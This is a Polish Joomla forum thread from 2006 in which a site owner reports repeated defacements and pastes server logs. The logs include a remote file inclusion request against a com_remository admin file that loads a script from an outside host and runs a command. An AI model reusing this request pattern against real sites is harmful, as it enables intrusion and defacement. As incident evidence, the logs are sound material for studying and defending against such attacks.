Joomla dziurawy jak sito :/

Locked
User avatar
szuman
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Sat Feb 04, 2006 3:09 pm
Location: Poland/Debica
Contact:

Joomla dziurawy jak sito :/

Post by szuman » Sun Aug 13, 2006 12:54 pm

Przykro to mowic, ale coraz wiecej dziur wyskakuje :/ Przed godzina kolejne wlamanie, tym razem totalna jazda po plikach. Strona podmieniona od frontu i od admina, nadpisanie plikow index nic nie daje :/

Fragmenty logów serwera z chwili ataku:

Code: Select all

128.194.135.81 - - [13/Aug/2006:13:43:19 +0200] "GET /index.php?option=com_simpleboard&Itemid=154&func=view&view=threaded&id=610&catid=16 HTTP/1.1" 200 3585 "-" "IRLbot/2.0 (compatible; MSIE 6.0; http://irl.cs.tamu.edu/crawler)"
128.194.135.81 - - [13/Aug/2006:13:44:00 +0200] "GET /index.php?option=com_simpleboard&Itemid=154&func=post&do=reply&replyto=610&catid=16 HTTP/1.1" 200 3585 "-" "IRLbot/2.0 (compatible; MSIE 6.0; http://irl.cs.tamu.edu/crawler)"
I wjazd na administracje:

Code: Select all

85.100.225.32 - - [13/Aug/2006:13:10:26 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://havsa.net/haluk.txt?&cmd=id HTTP/1.1" 200 19518 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
85.100.225.32 - - [13/Aug/2006:13:10:28 +0200] "POST /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://havsa.net/haluk.txt?&cmd=id HTTP/1.1" 200 36521 "http://wudeka.net/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://havsa.net/haluk.txt?&cmd=id" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
Wydawalo mi sie, ze jak zrobie upgrade do 1.0.10, usune dziury w file_upload.php i image_upload.php (simpleboard) to bedzie swiety spokoj. Wyglada na to, ze dziury pojawia sie jeszcze w wielu miejscach z formularzem...
Znowu Turecka robota, tym razem jednak nie znalazlem zadnego backdoora haluk.php. Moze sie wkurzyli o to, ze odpalajac swoj plik haluk.php zobaczyli dwa szkielety, z ktorych jeden drugiego posuwal w tylek z podpisem "Fack the hackers"? :|

User avatar
szuman
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Sat Feb 04, 2006 3:09 pm
Location: Poland/Debica
Contact:

Re: Joomla dziurawy jak sito :/

Post by szuman » Wed Aug 16, 2006 6:32 pm

trzeci raz  :'( chyba mnie polubili  ;)

MagdaBu
Joomla! Apprentice
Joomla! Apprentice
Posts: 22
Joined: Tue Apr 04, 2006 10:01 pm

Re: Joomla dziurawy jak sito :/

Post by MagdaBu » Wed Aug 16, 2006 9:39 pm

Przepraszam za glupie pytanie, ale jak sprawdzic te logi?

pozdrawiam i dziekuje,
Magda

User avatar
szuman
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Sat Feb 04, 2006 3:09 pm
Location: Poland/Debica
Contact:

Re: Joomla dziurawy jak sito :/

Post by szuman » Wed Aug 16, 2006 9:51 pm

Nie ma za co  ;D

Zaloguj sie do panelu administracyjnego i tam powinnas miec linki do plikow .gz z logami. Mozesz je rowniez znalezc na ftp - najczesciej katalog, w ktorym sa logi ma nazwe logs i znajduje sie w glownym katalogu ;)


Mam pytanie: duzo pomoze wylaczenie register globals? Bo teraz mam wlaczony...

User avatar
Roman Blanty
Joomla! Explorer
Joomla! Explorer
Posts: 372
Joined: Thu Aug 25, 2005 5:32 pm
Location: Internet
Contact:

Re: Joomla dziurawy jak sito :/

Post by Roman Blanty » Thu Aug 31, 2006 3:02 am

Pomoże złociutki
Proud Polish Joomla! Team Member > http://www.joomla.pl
Hardcore Translator ;)
Joomla! Translation Coordination Team
Jobs in IT: http://www.workita.com


Locked

Return to “Instalacja i aktualizacja”